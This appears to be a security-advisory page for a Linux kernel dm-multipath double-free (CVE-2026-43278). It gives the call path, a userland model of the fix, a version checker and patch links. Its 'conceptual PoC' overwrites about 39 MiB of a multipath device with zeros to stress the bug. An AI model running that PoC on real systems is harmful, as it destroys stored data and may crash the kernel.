Security Vulnerability Report
CVE-2026-43278 CVSS 7.8 HIGH

Published: 2026-05-06 12:16:49
Last Modified: 2026-05-08 19:38:25
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

dm: clear cloned request bio pointer when last clone bio completes

Stale rq->bio values have been observed to cause double-initialization of cloned bios in request-based device-mapper targets, leading to use-after-free and double-free scenarios.

One such case occurs when using dm-multipath on top of a PCIe NVMe namespace, where cloned request bios are freed during blk_complete_request(), but rq->bio is left intact. Subsequent clone teardown then attempts to free the same bios again via blk_rq_unprep_clone().

The resulting double-free path looks like:

  nvme_pci_complete_batch()
  nvme_complete_batch()
  blk_mq_end_request_batch()
  blk_complete_request()          // called on a DM clone request
  bio_endio()                     // first free of all clone bios
  ...
  rq->end_io()                    // end_clone_request()
  dm_complete_request(tio->orig)
  dm_softirq_done()
  dm_done()
  dm_end_request()
  blk_rq_unprep_clone()           // second free of clone bios

Fix this by clearing the clone request's bio pointer when the last cloned bio completes, ensuring that later teardown paths do not attempt to free already-released bios.
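To make the ordering above concrete, the following is an added userland model of the clone completion path. It is not kernel code and not taken from the patch: the struct layouts, the *_model functions and the put-counting are stand-ins written for this page. Instead of actually freeing memory, the model records every bio_put() so that a second put on the same bio is observable as a counter rather than as undefined behaviour, and the fix is reduced to the one line it consists of, clearing the clone's bio pointer when the last cloned bio completes.

```c
/*
 * Userland model of the CVE-2026-43278 completion path (added example,
 * not kernel code). Every name ending in _model is an invented stand-in
 * for the kernel function of the same base name.
 */
#include <stdio.h>
#include <stdlib.h>

struct bio {
    struct bio *bi_next;    /* singly linked list of cloned bios */
    int put_count;          /* how many times bio_put() ran on this bio */
};

struct request {
    struct bio *bio;        /* list head, i.e. the kernel's rq->bio */
};

struct stats {
    int puts;               /* total bio_put() calls */
    int double_puts;        /* puts on a bio that was already put */
};

/* Stand-in for bio_put(): records the call instead of freeing, so a
 * double put is a number we can check rather than heap corruption. */
static void bio_put_model(struct bio *b, struct stats *st)
{
    st->puts++;
    if (b->put_count++ > 0)
        st->double_puts++;
}

/* Stand-in for dm-rq's per-bio completion, run once per cloned bio while
 * bio_endio() walks the list inside blk_complete_request(). With the fix,
 * completing the last bio also drops the now-stale list head. */
static void end_clone_bio_model(struct request *clone, struct bio *b,
                                int fixed, struct stats *st)
{
    int is_last = (b->bi_next == NULL);

    bio_put_model(b, st);
    if (is_last && fixed)
        clone->bio = NULL;
}

/* Stand-in for blk_rq_unprep_clone(): pop whatever rq->bio still points
 * at and put it. Unpatched, this re-walks bios that were already put,
 * so the b->bi_next read here is the use-after-free and the put the
 * double free. */
static void blk_rq_unprep_clone_model(struct request *clone, struct stats *st)
{
    struct bio *b;

    while ((b = clone->bio) != NULL) {
        clone->bio = b->bi_next;
        bio_put_model(b, st);
    }
}

/* The path from the advisory: bio_endio() over all clone bios, then
 * rq->end_io() -> dm_end_request() -> blk_rq_unprep_clone(). */
static void complete_clone_request_model(struct request *clone, int fixed,
                                         struct stats *st)
{
    struct bio *b = clone->bio, *next;

    while (b) {
        next = b->bi_next;      /* read before put, as the real walker does */
        end_clone_bio_model(clone, b, fixed, st);
        b = next;
    }
    blk_rq_unprep_clone_model(clone, st);
}

/* Build a clone request with nbios cloned bios, run the completion path,
 * and return how many bios were put twice. fixed=1 applies the fix. */
int simulate_completion(unsigned nbios, int fixed, struct stats *out)
{
    struct bio *bios = calloc(nbios, sizeof *bios);
    struct request clone = { .bio = nbios ? &bios[0] : NULL };
    struct stats st = { 0, 0 };

    for (unsigned i = 0; i + 1 < nbios; i++)
        bios[i].bi_next = &bios[i + 1];

    complete_clone_request_model(&clone, fixed, &st);
    if (out)
        *out = st;
    free(bios);
    return st.double_puts;
}

int main(void)
{
    struct stats st;

    simulate_completion(3, 0, &st);
    printf("unpatched: %d puts, %d double puts\n", st.puts, st.double_puts);
    simulate_completion(3, 1, &st);
    printf("patched:   %d puts, %d double puts\n", st.puts, st.double_puts);
    return 0;
}
```

With three cloned bios the unpatched path performs six puts and reports three double puts; the patched path performs exactly three and none. In the kernel the equivalent of the counter is KASAN or the slab allocator's double-free detection, which is what turns the stale rq->bio into the crash the advisory describes.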

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (6.1 <= version < 6.1.165)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (6.2 <= version < 6.6.128)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (6.7 <= version < 6.12.75)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (6.13 <= version < 6.18.16)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (6.19 <= version < 6.19.6)

Version bounds are taken from the NVD configuration data (versionStartIncluding / versionEndExcluding) in the raw JSON below. The fixed stable releases are therefore 6.1.165, 6.6.128, 6.12.75, 6.18.16 and 6.19.6; kernels before 6.1 are not listed as affected. Distribution kernels often backport fixes without changing the version number, so check the distribution's changelog for the patch commit IDs listed under References rather than relying on the version string alone.
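An added check, not part of the advisory, that compares a kernel release string (as printed by uname -r) against the five affected ranges above. The range table is transcribed from the NVD configuration data on this page; the parse_kver and kernel_is_affected names are this example's own.

```c
/* Added example: classify a kernel release string against the affected
 * ranges published for CVE-2026-43278. Not part of the advisory. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/utsname.h>

struct kver { int maj, min, patch; };

/* Parse "6.6.127-1-generic" or "6.19" into numeric parts. Distribution
 * suffixes after the third number are ignored. Returns 0 if fewer than
 * two numbers could be read. */
int parse_kver(const char *s, struct kver *v)
{
    v->maj = v->min = v->patch = 0;
    return sscanf(s, "%d.%d.%d", &v->maj, &v->min, &v->patch) >= 2;
}

static int cmp_kver(struct kver a, struct kver b)
{
    if (a.maj != b.maj) return a.maj < b.maj ? -1 : 1;
    if (a.min != b.min) return a.min < b.min ? -1 : 1;
    if (a.patch != b.patch) return a.patch < b.patch ? -1 : 1;
    return 0;
}

/* versionStartIncluding / versionEndExcluding pairs from the advisory's
 * NVD configuration data (transcribed, not fetched). */
static const struct { const char *start, *end; } affected[] = {
    { "6.1",  "6.1.165" },
    { "6.2",  "6.6.128" },
    { "6.7",  "6.12.75" },
    { "6.13", "6.18.16" },
    { "6.19", "6.19.6"  },
};

/* 1 if the version lies in an affected range, 0 if it is outside all of
 * them (fixed, or never affected), -1 if the string is unparseable. */
int kernel_is_affected(const char *version)
{
    struct kver v, lo, hi;

    if (!parse_kver(version, &v))
        return -1;
    for (size_t i = 0; i < sizeof affected / sizeof affected[0]; i++) {
        parse_kver(affected[i].start, &lo);
        parse_kver(affected[i].end, &hi);
        if (cmp_kver(v, lo) >= 0 && cmp_kver(v, hi) < 0)
            return 1;
    }
    return 0;
}

int main(void)
{
    struct utsname u;
    int r;

    if (uname(&u) != 0) {
        perror("uname");
        return 1;
    }
    r = kernel_is_affected(u.release);
    printf("%s: %s\n", u.release,
           r == 1 ? "inside an affected range" :
           r == 0 ? "outside all affected ranges" : "unparseable version");
    return 0;
}
```

A result of "inside an affected range" means the upstream version is affected; it does not prove a distribution kernel is, since vendors backport stable fixes under unchanged version numbers. Treat the result as a prompt to verify the patch commit IDs in the References section against the distribution's changelog.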

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * Conceptual PoC for CVE-2026-43278.
 * Triggering the double-free in dm-multipath requires specific I/O patterns;
 * this program only stresses the request completion path of a dm-multipath
 * device and does not guarantee a crash. Opening the mapped device needs
 * root (or disk-group) privileges, and plain buffered write() calls reach
 * the device only at writeback. The writes are destructive: they overwrite
 * the first 10000 * 4096 bytes (about 39 MiB) of the mapped device, so run
 * it only against a throwaway test volume.
 */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

static void trigger_crash(void)
{
    /* Open a device managed by dm-multipath (e.g., /dev/mapper/mpatha).
     * This requires the system to be configured with dm-multipath. */
    int fd = open("/dev/mapper/mpatha", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return;
    }

    printf("[*] Sending I/O requests to trigger UAF condition...\n");

    char *buffer = malloc(4096);
    if (!buffer) {
        perror("malloc");
        close(fd);
        return;
    }
    memset(buffer, 0, 4096);

    /* Continuous write operations to stress the clone request completion path. */
    for (int i = 0; i < 10000; i++) {
        if (write(fd, buffer, 4096) != 4096) {
            perror("write");
            break;
        }
    }

    free(buffer);
    close(fd);
    /* If vulnerable, the kernel may hit a double-free or general protection fault. */
}

int main(void)
{
    trigger_crash();
    return 0;
}

References

Patch commits (from the NVD record below; all are stable-tree commits on git.kernel.org):

https://git.kernel.org/stable/c/7daf279c674d515fb22a727a7bbc92aeb35c5442
https://git.kernel.org/stable/c/83d72091804600ead96dc9e9f518ea56cb4942f6
https://git.kernel.org/stable/c/8d9ddad561136f7e6a9346767bf97b4d79e38e67
https://git.kernel.org/stable/c/b1c1a2637ebd675aa2d71fee8c70da8791d73850
https://git.kernel.org/stable/c/e2e738e8dfbbf83bd2bae0467ec4420cc52da42a
https://git.kernel.org/stable/c/fb8a6c18fb9a6561f7a15b58b272442b77a242dd
https://git.kernel.org/stable/c/3d746b639be4b4f5cd8ce2b06aa52dc443f50edc
https://git.kernel.org/stable/c/9a95b98202113045bc1a5bcb30388a500f25e050

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43278", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:49.213", "lastModified": "2026-05-08T19:38:24.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: clear cloned request bio pointer when last clone bio completes\n\nStale rq->bio values have been observed to cause double-initialization of\ncloned bios in request-based device-mapper targets, leading to\nuse-after-free and double-free scenarios.\n\nOne such case occurs when using dm-multipath on top of a PCIe NVMe\nnamespace, where cloned request bios are freed during\nblk_complete_request(), but rq->bio is left intact. Subsequent clone\nteardown then attempts to free the same bios again via\nblk_rq_unprep_clone().\n\nThe resulting double-free path looks like:\n\n nvme_pci_complete_batch()\n nvme_complete_batch()\n blk_mq_end_request_batch()\n blk_complete_request() // called on a DM clone request\n bio_endio() // first free of all clone bios\n ...\n rq->end_io() // end_clone_request()\n dm_complete_request(tio->orig)\n dm_softirq_done()\n dm_done()\n dm_end_request()\n blk_rq_unprep_clone() // second free of clone bios\n\nFix this by clearing the clone request's bio pointer when the last cloned\nbio completes, ensuring that later teardown paths do not attempt to free\nalready-released bios."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.165", "matchCriteriaId": "96EF3286-5BCE-4D88-B8C9-4292E5BA7A18"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7daf279c674d515fb22a727a7bbc92aeb35c5442", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/83d72091804600ead96dc9e9f518ea56cb4942f6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d9ddad561136f7e6a9346767bf97b4d79e38e67", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b1c1a2637ebd675aa2d71fee8c70da8791d73850", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e2e738e8dfbbf83bd2bae0467ec4420cc52da42a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fb8a6c18fb9a6561f7a15b58b272442b77a242dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3d746b639be4b4f5cd8ce2b06aa52dc443f50edc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9a95b98202113045bc1a5bcb30388a500f25e050", "source": "[email protected]", "tags": ["Patch"]}]}}